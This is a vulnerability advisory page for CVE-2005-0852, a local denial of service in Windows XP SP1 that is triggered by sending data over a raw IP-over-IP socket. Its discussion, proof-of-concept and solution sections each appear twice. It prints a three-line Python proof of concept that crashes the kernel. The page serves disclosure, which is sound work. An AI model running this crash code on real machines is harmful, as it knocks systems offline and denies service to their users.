Microsoft Windows Local Denial Of Service Vulnerability
BID:12870
Info
Microsoft Windows Local Denial Of Service Vulnerability
| Bugtraq ID: | 12870 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2005-0852 |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 22 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery of this issue is credited to <[email protected]>. |
| Vulnerable: |
Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Professional SP1 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Home SP1 |
| Not Vulnerable: | |
Discussion
Microsoft Windows Local Denial Of Service Vulnerability
It is reported that Microsoft Windows XP Service Pack 1 is prone to a local denial of service vulnerability.
The issue is reported to manifest when a raw IP over IP socket is created and data is transferred over the newly created socket.
It is reported that this operation causes the kernel of the Windows computer to crash, resulting in the computer rebooting. If this issue can be triggered reliably, a local attacker may exploit the issue to deny service for legitimate users.
Further investigation into this issue is ongoing; this BID will be updated as soon as more details are available.
It is reported that Microsoft Windows XP Service Pack 1 is prone to a local denial of service vulnerability.
The issue is reported to manifest when a raw IP over IP socket is created and data is transferred over the newly created socket.
It is reported that this operation causes the kernel of the Windows computer to crash, resulting in the computer rebooting. If this issue can be triggered reliably, a local attacker may exploit the issue to deny service for legitimate users.
Further investigation into this issue is ongoing; this BID will be updated as soon as more details are available.
Exploit / POC
Microsoft Windows Local Denial Of Service Vulnerability
The following exploit is available:
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4)
s.sendto("",("x.x.x.x",0))
Press ENTER and your win box should crash immediately.
The following exploit is available:
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4)
s.sendto("",("x.x.x.x",0))
Press ENTER and your win box should crash immediately.
Solution / Fix
Microsoft Windows Local Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.